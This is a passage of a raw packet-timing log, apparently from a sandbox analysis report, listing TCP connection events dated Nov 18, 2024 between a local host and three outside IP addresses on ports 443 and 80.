                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.723092079 CET49731443192.168.2.4142.215.209.78
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.723094940 CET44349731142.215.209.78192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.723140955 CET49731443192.168.2.4142.215.209.78
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.723381996 CET44349731142.215.209.78192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.723436117 CET44349731142.215.209.78192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.723453045 CET49731443192.168.2.4142.215.209.78
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.723457098 CET44349731142.215.209.78192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.723527908 CET44349731142.215.209.78192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.723556995 CET49731443192.168.2.4142.215.209.78
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.723579884 CET44349731142.215.209.78192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.723591089 CET49731443192.168.2.4142.215.209.78
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.723598003 CET44349731142.215.209.78192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.723668098 CET49731443192.168.2.4142.215.209.78
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.723673105 CET44349731142.215.209.78192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.723716021 CET49731443192.168.2.4142.215.209.78
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.723767042 CET44349731142.215.209.78192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.723809958 CET44349731142.215.209.78192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.723836899 CET49731443192.168.2.4142.215.209.78
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.723839998 CET44349731142.215.209.78192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.724023104 CET49731443192.168.2.4142.215.209.78
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.724023104 CET49731443192.168.2.4142.215.209.78
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.724186897 CET44349731142.215.209.78192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.724236012 CET44349731142.215.209.78192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.724267006 CET49731443192.168.2.4142.215.209.78
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.724271059 CET44349731142.215.209.78192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.724318981 CET49731443192.168.2.4142.215.209.78
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.724318981 CET49731443192.168.2.4142.215.209.78
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.724488974 CET44349731142.215.209.78192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.724553108 CET49731443192.168.2.4142.215.209.78
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.724559069 CET44349731142.215.209.78192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.724658012 CET44349731142.215.209.78192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.724699020 CET44349731142.215.209.78192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.724723101 CET49731443192.168.2.4142.215.209.78
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.724726915 CET44349731142.215.209.78192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.724785089 CET44349731142.215.209.78192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.724800110 CET49731443192.168.2.4142.215.209.78
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.724845886 CET49731443192.168.2.4142.215.209.78
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.724849939 CET44349731142.215.209.78192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.724891901 CET44349731142.215.209.78192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.724930048 CET44349731142.215.209.78192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.724950075 CET49731443192.168.2.4142.215.209.78
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.724955082 CET44349731142.215.209.78192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.724994898 CET49731443192.168.2.4142.215.209.78
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.725168943 CET44349731142.215.209.78192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.725263119 CET49731443192.168.2.4142.215.209.78
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.725269079 CET44349731142.215.209.78192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.725326061 CET44349731142.215.209.78192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.725375891 CET44349731142.215.209.78192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.725392103 CET49731443192.168.2.4142.215.209.78
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.725400925 CET44349731142.215.209.78192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.725460052 CET44349731142.215.209.78192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.725474119 CET49731443192.168.2.4142.215.209.78
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.725474119 CET49731443192.168.2.4142.215.209.78
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.725480080 CET44349731142.215.209.78192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.725519896 CET44349731142.215.209.78192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.725542068 CET49731443192.168.2.4142.215.209.78
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.725580931 CET49731443192.168.2.4142.215.209.78
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.725584984 CET44349731142.215.209.78192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.725625038 CET44349731142.215.209.78192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.725677967 CET44349731142.215.209.78192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.725691080 CET49731443192.168.2.4142.215.209.78
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.725694895 CET44349731142.215.209.78192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.725801945 CET49731443192.168.2.4142.215.209.78
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.725807905 CET44349731142.215.209.78192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.725981951 CET49731443192.168.2.4142.215.209.78
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.726155996 CET44349731142.215.209.78192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.726229906 CET49731443192.168.2.4142.215.209.78
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.726236105 CET44349731142.215.209.78192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.726305008 CET44349731142.215.209.78192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.726356983 CET44349731142.215.209.78192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.726381063 CET49731443192.168.2.4142.215.209.78
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.726387978 CET44349731142.215.209.78192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.726424932 CET49731443192.168.2.4142.215.209.78
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.726486921 CET44349731142.215.209.78192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.726547956 CET44349731142.215.209.78192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.726594925 CET44349731142.215.209.78192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.726624012 CET49731443192.168.2.4142.215.209.78
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.726624012 CET49731443192.168.2.4142.215.209.78
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.726629019 CET44349731142.215.209.78192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.726690054 CET44349731142.215.209.78192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.726703882 CET49731443192.168.2.4142.215.209.78
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.726703882 CET49731443192.168.2.4142.215.209.78
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.726708889 CET44349731142.215.209.78192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.726788998 CET44349731142.215.209.78192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.726808071 CET49731443192.168.2.4142.215.209.78
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.726870060 CET49731443192.168.2.4142.215.209.78
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.726875067 CET44349731142.215.209.78192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.727164030 CET44349731142.215.209.78192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.727221012 CET49731443192.168.2.4142.215.209.78
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.727226019 CET44349731142.215.209.78192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.727278948 CET44349731142.215.209.78192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.727333069 CET49731443192.168.2.4142.215.209.78
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.727336884 CET44349731142.215.209.78192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.727372885 CET44349731142.215.209.78192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.727437019 CET49731443192.168.2.4142.215.209.78
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.727442026 CET44349731142.215.209.78192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.727473974 CET44349731142.215.209.78192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.727570057 CET44349731142.215.209.78192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.727582932 CET49731443192.168.2.4142.215.209.78
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.727588892 CET44349731142.215.209.78192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.727648973 CET44349731142.215.209.78192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.727693081 CET49731443192.168.2.4142.215.209.78
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.727693081 CET49731443192.168.2.4142.215.209.78
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.727698088 CET44349731142.215.209.78192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.727718115 CET44349731142.215.209.78192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.727727890 CET49731443192.168.2.4142.215.209.78
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.727768898 CET49731443192.168.2.4142.215.209.78
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.727773905 CET44349731142.215.209.78192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.728460073 CET44349731142.215.209.78192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.728509903 CET44349731142.215.209.78192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.728540897 CET49731443192.168.2.4142.215.209.78
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.728544950 CET44349731142.215.209.78192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.728641033 CET49731443192.168.2.4142.215.209.78
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.747991085 CET44349731142.215.209.78192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.748155117 CET49731443192.168.2.4142.215.209.78
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.748159885 CET44349731142.215.209.78192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.748207092 CET44349731142.215.209.78192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.748286963 CET49731443192.168.2.4142.215.209.78
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.748292923 CET44349731142.215.209.78192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.800776958 CET49731443192.168.2.4142.215.209.78
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.823453903 CET44349731142.215.209.78192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.823549986 CET49731443192.168.2.4142.215.209.78
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.823556900 CET44349731142.215.209.78192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.823606014 CET44349731142.215.209.78192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.823673964 CET49731443192.168.2.4142.215.209.78
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.823678970 CET44349731142.215.209.78192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.823920965 CET44349731142.215.209.78192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.823982954 CET49731443192.168.2.4142.215.209.78
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.823987961 CET44349731142.215.209.78192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.824210882 CET44349731142.215.209.78192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.824290037 CET44349731142.215.209.78192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.824311972 CET49731443192.168.2.4142.215.209.78
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.824316978 CET44349731142.215.209.78192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.824357986 CET49731443192.168.2.4142.215.209.78
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.867078066 CET44349731142.215.209.78192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.867208004 CET49731443192.168.2.4142.215.209.78
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.872665882 CET49731443192.168.2.4142.215.209.78
                                                                                                                                                                                                                            Nov 18, 2024 18:37:29.888891935 CET4973080192.168.2.4107.172.44.178
                                                                                                                                                                                                                            Nov 18, 2024 18:37:42.135199070 CET4973880192.168.2.4107.172.44.178
                                                                                                                                                                                                                            Nov 18, 2024 18:37:42.140031099 CET8049738107.172.44.178192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:42.140187025 CET4973880192.168.2.4107.172.44.178
                                                                                                                                                                                                                            Nov 18, 2024 18:37:42.140311956 CET4973880192.168.2.4107.172.44.178
                                                                                                                                                                                                                            Nov 18, 2024 18:37:42.145561934 CET8049738107.172.44.178192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:42.823004007 CET8049738107.172.44.178192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:42.823098898 CET8049738107.172.44.178192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:42.823112011 CET8049738107.172.44.178192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:42.823164940 CET4973880192.168.2.4107.172.44.178
                                                                                                                                                                                                                            Nov 18, 2024 18:37:42.823468924 CET8049738107.172.44.178192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:42.823482990 CET8049738107.172.44.178192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:42.823494911 CET8049738107.172.44.178192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:42.823522091 CET4973880192.168.2.4107.172.44.178
                                                                                                                                                                                                                            Nov 18, 2024 18:37:42.823600054 CET4973880192.168.2.4107.172.44.178
                                                                                                                                                                                                                            Nov 18, 2024 18:37:42.824312925 CET8049738107.172.44.178192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:42.824326992 CET8049738107.172.44.178192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:42.824338913 CET8049738107.172.44.178192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:42.824395895 CET4973880192.168.2.4107.172.44.178
                                                                                                                                                                                                                            Nov 18, 2024 18:37:42.825136900 CET8049738107.172.44.178192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:42.825189114 CET4973880192.168.2.4107.172.44.178
                                                                                                                                                                                                                            Nov 18, 2024 18:37:42.829281092 CET8049738107.172.44.178192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:42.829503059 CET8049738107.172.44.178192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:42.829514980 CET8049738107.172.44.178192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:42.829607964 CET4973880192.168.2.4107.172.44.178
                                                                                                                                                                                                                            Nov 18, 2024 18:37:42.885965109 CET4973880192.168.2.4107.172.44.178
                                                                                                                                                                                                                            Nov 18, 2024 18:37:42.947860003 CET8049738107.172.44.178192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:42.948029995 CET8049738107.172.44.178192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:42.948069096 CET8049738107.172.44.178192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:42.948098898 CET4973880192.168.2.4107.172.44.178
                                                                                                                                                                                                                            Nov 18, 2024 18:37:42.948548079 CET8049738107.172.44.178192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:42.948584080 CET8049738107.172.44.178192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:42.948602915 CET4973880192.168.2.4107.172.44.178
                                                                                                                                                                                                                            Nov 18, 2024 18:37:42.949060917 CET8049738107.172.44.178192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:42.949096918 CET8049738107.172.44.178192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:42.949120045 CET4973880192.168.2.4107.172.44.178
                                                                                                                                                                                                                            Nov 18, 2024 18:37:42.949135065 CET8049738107.172.44.178192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:42.949198008 CET4973880192.168.2.4107.172.44.178
                                                                                                                                                                                                                            Nov 18, 2024 18:37:42.949867964 CET8049738107.172.44.178192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:42.949904919 CET8049738107.172.44.178192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:42.949959993 CET4973880192.168.2.4107.172.44.178
                                                                                                                                                                                                                            Nov 18, 2024 18:37:42.950397015 CET8049738107.172.44.178192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:42.950432062 CET8049738107.172.44.178192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:42.950467110 CET8049738107.172.44.178192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:42.950493097 CET4973880192.168.2.4107.172.44.178
                                                                                                                                                                                                                            Nov 18, 2024 18:37:42.951252937 CET8049738107.172.44.178192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:42.951288939 CET8049738107.172.44.178192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:42.951308966 CET4973880192.168.2.4107.172.44.178
                                                                                                                                                                                                                            Nov 18, 2024 18:37:42.951714039 CET8049738107.172.44.178192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:42.951749086 CET8049738107.172.44.178192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:42.951781988 CET4973880192.168.2.4107.172.44.178
                                                                                                                                                                                                                            Nov 18, 2024 18:37:42.951783895 CET8049738107.172.44.178192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:42.951983929 CET4973880192.168.2.4107.172.44.178
                                                                                                                                                                                                                            Nov 18, 2024 18:37:42.952573061 CET8049738107.172.44.178192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:42.952609062 CET8049738107.172.44.178192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:42.952642918 CET8049738107.172.44.178192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:42.952671051 CET4973880192.168.2.4107.172.44.178
                                                                                                                                                                                                                            Nov 18, 2024 18:37:42.953461885 CET8049738107.172.44.178192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:42.953500032 CET8049738107.172.44.178192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:42.953516006 CET4973880192.168.2.4107.172.44.178
                                                                                                                                                                                                                            Nov 18, 2024 18:37:42.953792095 CET8049738107.172.44.178192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:42.953844070 CET4973880192.168.2.4107.172.44.178
                                                                                                                                                                                                                            Nov 18, 2024 18:37:43.063627958 CET8049738107.172.44.178192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:43.063797951 CET8049738107.172.44.178192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:43.063833952 CET8049738107.172.44.178192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:43.063873053 CET8049738107.172.44.178192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:43.063961029 CET4973880192.168.2.4107.172.44.178
                                                                                                                                                                                                                            Nov 18, 2024 18:37:43.063961029 CET4973880192.168.2.4107.172.44.178
                                                                                                                                                                                                                            Nov 18, 2024 18:37:43.064490080 CET8049738107.172.44.178192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:43.064524889 CET8049738107.172.44.178192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:43.064558029 CET8049738107.172.44.178192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:43.064588070 CET4973880192.168.2.4107.172.44.178
                                                                                                                                                                                                                            Nov 18, 2024 18:37:43.113387108 CET4973880192.168.2.4107.172.44.178
                                                                                                                                                                                                                            Nov 18, 2024 18:37:43.116134882 CET4973880192.168.2.4107.172.44.178
                                                                                                                                                                                                                            Nov 18, 2024 18:38:07.959789991 CET4978180192.168.2.446.173.214.24
                                                                                                                                                                                                                            Nov 18, 2024 18:38:07.976816893 CET804978146.173.214.24192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:38:07.976937056 CET4978180192.168.2.446.173.214.24
                                                                                                                                                                                                                            Nov 18, 2024 18:38:07.977413893 CET4978180192.168.2.446.173.214.24
                                                                                                                                                                                                                            Nov 18, 2024 18:38:07.977498055 CET4978180192.168.2.446.173.214.24
                                                                                                                                                                                                                            Nov 18, 2024 18:38:07.991450071 CET804978146.173.214.24192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:38:07.999051094 CET804978146.173.214.24192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:38:09.197149992 CET804978146.173.214.24192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:38:09.197285891 CET804978146.173.214.24192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:38:09.197300911 CET804978146.173.214.24192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:38:09.197379112 CET4978180192.168.2.446.173.214.24
                                                                                                                                                                                                                            Nov 18, 2024 18:38:09.197504997 CET804978146.173.214.24192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:38:09.197519064 CET804978146.173.214.24192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:38:09.197536945 CET804978146.173.214.24192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:38:09.197551012 CET4978180192.168.2.446.173.214.24
                                                                                                                                                                                                                            Nov 18, 2024 18:38:09.197583914 CET4978180192.168.2.446.173.214.24
                                                                                                                                                                                                                            Nov 18, 2024 18:38:09.197912931 CET804978146.173.214.24192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:38:09.197995901 CET804978146.173.214.24192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:38:09.198040962 CET4978180192.168.2.446.173.214.24
                                                                                                                                                                                                                            Nov 18, 2024 18:38:09.198194027 CET804978146.173.214.24192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:38:09.198208094 CET804978146.173.214.24192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:38:09.198257923 CET4978180192.168.2.446.173.214.24
                                                                                                                                                                                                                            Nov 18, 2024 18:38:09.212990046 CET804978146.173.214.24192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:38:09.213233948 CET804978146.173.214.24192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:38:09.213294029 CET4978180192.168.2.446.173.214.24
                                                                                                                                                                                                                            Nov 18, 2024 18:38:09.213498116 CET804978146.173.214.24192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:38:09.213515997 CET804978146.173.214.24192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:38:09.213556051 CET4978180192.168.2.446.173.214.24
                                                                                                                                                                                                                            Nov 18, 2024 18:38:09.214406013 CET804978146.173.214.24192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:38:09.269649029 CET4978180192.168.2.446.173.214.24
                                                                                                                                                                                                                            Nov 18, 2024 18:38:09.361006021 CET804978146.173.214.24192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:38:09.361103058 CET804978146.173.214.24192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:38:09.361118078 CET804978146.173.214.24192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:38:09.361159086 CET4978180192.168.2.446.173.214.24
                                                                                                                                                                                                                            Nov 18, 2024 18:38:09.361388922 CET804978146.173.214.24192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:38:09.361433983 CET4978180192.168.2.446.173.214.24
                                                                                                                                                                                                                            Nov 18, 2024 18:38:09.362128973 CET804978146.173.214.24192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:38:09.362426043 CET804978146.173.214.24192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:38:09.362474918 CET4978180192.168.2.446.173.214.24
                                                                                                                                                                                                                            Nov 18, 2024 18:38:09.363193989 CET804978146.173.214.24192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:38:09.363471031 CET804978146.173.214.24192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:38:09.363518953 CET4978180192.168.2.446.173.214.24
                                                                                                                                                                                                                            Nov 18, 2024 18:38:09.364003897 CET804978146.173.214.24192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:38:09.364299059 CET804978146.173.214.24192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:38:09.364342928 CET4978180192.168.2.446.173.214.24
                                                                                                                                                                                                                            Nov 18, 2024 18:38:09.364829063 CET804978146.173.214.24192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:38:09.365003109 CET804978146.173.214.24192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:38:09.365046978 CET4978180192.168.2.446.173.214.24
                                                                                                                                                                                                                            Nov 18, 2024 18:38:09.365787029 CET804978146.173.214.24192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:38:09.365900993 CET804978146.173.214.24192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:38:09.365941048 CET4978180192.168.2.446.173.214.24
                                                                                                                                                                                                                            Nov 18, 2024 18:38:09.366729975 CET804978146.173.214.24192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:38:09.366933107 CET804978146.173.214.24192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:38:09.366985083 CET4978180192.168.2.446.173.214.24
                                                                                                                                                                                                                            Nov 18, 2024 18:38:09.367724895 CET804978146.173.214.24192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:38:09.367840052 CET804978146.173.214.24192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:38:09.367891073 CET4978180192.168.2.446.173.214.24
                                                                                                                                                                                                                            Nov 18, 2024 18:38:09.368571997 CET804978146.173.214.24192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:38:09.368736982 CET804978146.173.214.24192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:38:09.368786097 CET4978180192.168.2.446.173.214.24
                                                                                                                                                                                                                            Nov 18, 2024 18:38:09.369658947 CET804978146.173.214.24192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:38:09.369827986 CET804978146.173.214.24192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:38:09.369880915 CET4978180192.168.2.446.173.214.24
                                                                                                                                                                                                                            Nov 18, 2024 18:38:09.370501995 CET804978146.173.214.24192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:38:09.370651007 CET804978146.173.214.24192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:38:09.370697021 CET4978180192.168.2.446.173.214.24
                                                                                                                                                                                                                            Nov 18, 2024 18:38:09.371455908 CET804978146.173.214.24192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:38:09.425827980 CET4978180192.168.2.446.173.214.24
